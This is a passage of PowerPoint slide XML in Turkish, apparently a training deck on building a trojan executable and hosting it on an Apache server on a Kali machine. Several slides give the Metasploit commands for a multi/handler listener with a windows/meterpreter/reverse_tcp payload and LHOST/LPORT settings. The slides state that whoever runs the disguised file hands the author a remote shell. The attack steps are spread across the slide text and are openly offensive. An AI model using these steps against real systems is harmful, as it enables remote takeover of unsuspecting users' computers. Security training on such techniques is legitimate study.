                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Trojen’i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> şu konuma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/var/www/html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>içine kaydedeceğiz. Artı buraya bir dosya oluşturmamız gerekiyor istediğimiz dosya adını verebiliriz. Ben </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DenemeDosya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> adında bir dosya oluşturdum ve oluşturduğum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>deneme.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>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dosyasını içine kaydettim. Artık hedefimiz benim oluşturduğum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>trojen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> bağlantısını aktif hale geçirdiğinde </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>bana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> ekranı düşürecek.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222364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ekran, ekran görüntüsü içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5581A07-FBAB-0B70-B3A8-E9038A09589E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="23977"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4" name="Dikdörtgen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08BF7DDD-6A19-D8BB-3C9A-E039AEE02123}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180279" y="4663440"/>
            <a:ext cx="6113841" cy="9906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2825BEAF-39AB-2529-170B-8AA977D2316B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5629835" y="2133600"/>
            <a:ext cx="5737412" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Oluşturulan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Trojen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> açılan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Server’in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> içine yerleştirilir.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46258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6AFF7B33-191C-1FF1-38E2-C8B8BB82735B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="16933"/>
            <a:ext cx="12192000" cy="3801533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Metin kutusu 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2316C75-4796-0A26-AB28-F8C9E2080DD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3801533"/>
            <a:ext cx="12039600" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hedef sistemin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>trojen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> ile bağlantı kurması beklenirken bir yandan da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> makinası üzerinde açılan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Server dinleme </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>moduna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> alınır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" sz="2000" b="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>multi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>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msfconlose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> içindeki port dinleme modülünü seçiyoruz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>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Msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> ile oluşturduğumuz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Payload’ı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> belirtiyoruz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>set LHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1"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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> kısmında yazdığımız </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ipadresini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> makinası)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>set LPORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1"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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> kısmında yazdığımız </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>port numarası </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(dinlemek istediğimiz) belirtiyoruz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>   diyerek port dinleme işlemini başlatıyoruz. Artık bu saatten sonra oluşturduğumuz zararlı yazılımı aktif hale getiren kullanıcıdan Shell alma işlemi gerçekleşecektir.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Sol Ok 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC2B84F3-5581-0650-C111-CF30C8F2D637}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181600" y="203200"/>
            <a:ext cx="1049867" cy="1693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Sol Ok 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A510E6CA-F95A-4804-EC9C-3778C3F1819D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7424057" y="1291145"/>
            <a:ext cx="1049867" cy="1693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Sol Ok 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1706A35A-1B61-705F-5A71-20E397ED9FAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6792686" y="1833034"/>
            <a:ext cx="1049867" cy="1693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Sol Ok 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BEED061-A4C7-FF6B-F01A-7E411F506AF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6036514" y="2407178"/>
            <a:ext cx="1049867" cy="1693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Sol Ok 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E009D6-9C7D-13C8-B87B-622EC95B7B79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8343075" y="509301"/>
            <a:ext cx="1049867" cy="1693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B1097152-CECC-67D5-B8EC-C795AD61DA4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231467" y="181"/>
            <a:ext cx="231268" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0">
                <a:solidFill>
